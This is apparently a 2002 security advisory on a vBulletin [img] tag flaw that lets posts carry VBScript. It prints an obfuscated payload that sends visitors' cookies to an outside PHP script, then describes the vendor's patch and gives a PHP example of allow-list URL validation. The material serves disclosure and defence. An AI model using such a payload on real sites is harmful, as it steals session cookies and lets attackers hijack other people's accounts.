22nd Mar 2002 [SBWID-5203]
COMMAND
vBulletin account hijacking using [IMG] tag
SYSTEMS AFFECTED
2.2.2, 2.2.1 and possibly older versions
PROBLEM
Cano2 [http://www.buhaboard.de] found the following regarding vBulletin, a
web forums package written in PHP.
There is a vulnerability in vBulletin's [img] tag implementation
that allows users to inject VBScript code into posts and private messages
([img] is switched on by default). Through that, an attacker is able to
steal other users' cookies and possibly hijack their accounts.
The following code sends the user's cookie to a PHP script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which just
prints it back to the browser). It is enclosed in a [code] tag, the URL is
encoded as ASCII character codes, and line breaks are inserted to avoid
filtering of some characters and the insertion of <br> tags:
[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
SOLUTION
Jelsoft claimed to have made a patch "which clamps down on what
characters are allowed in an [img] tag, as well as requiring it to
start with http://".
Patched in the latest version (2.2.4).
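The kind of check that patch description implies, as an added example (this is not Jelsoft's code): an [img] renderer that emits an <img> element only when the value starts with http:// and consists solely of allow-listed characters. The function names, the exact allow-list and the sample posts are assumptions made for illustration.

```php
<?php
// Added example, not vBulletin's code. Function names, the allow-list and
// the sample inputs are assumptions made for illustration.

// Return the URL if it is acceptable inside [img]...[/img], else null.
// Policy follows the advisory's description of the fix: http:// prefix only,
// restricted character set.
function validate_img_url(string $raw): ?string
{
    $url = trim($raw);
    // Anchored with \A and \z so an embedded newline cannot hide a tail;
    // no whitespace, quotes, parentheses, '<', '>' or '+' are permitted.
    if (!preg_match('~\Ahttp://[A-Za-z0-9.\-]+(:\d+)?(/[A-Za-z0-9._\-/%?=&]*)?\z~', $url)) {
        return null;
    }
    return $url;
}

// Render [img] tags; rejected values stay as inert, HTML-escaped text.
function render_img_tags(string $post): string
{
    $escaped = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '~\[img\](.*?)\[/img\]~is',
        function (array $m): string {
            $url = validate_img_url(html_entity_decode($m[1], ENT_QUOTES, 'UTF-8'));
            if ($url === null) {
                return $m[0]; // already escaped, shown as literal text
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $escaped
    );
}

// Constructed sample posts.
$samples = [
    "[img]http://example.com/pics/cat.jpg[/img]",
    "[img]vbscript:location.replace(\nchr(104)+chr(116))[/img]",
    "[img]http://example.com/a.jpg\" onerror=\"x[/img]",
];
foreach ($samples as $s) {
    echo render_img_tags($s), "\n";
}
```

Only the first sample produces an <img> element; the other two are output as escaped literal text because they fail the scheme or character checks.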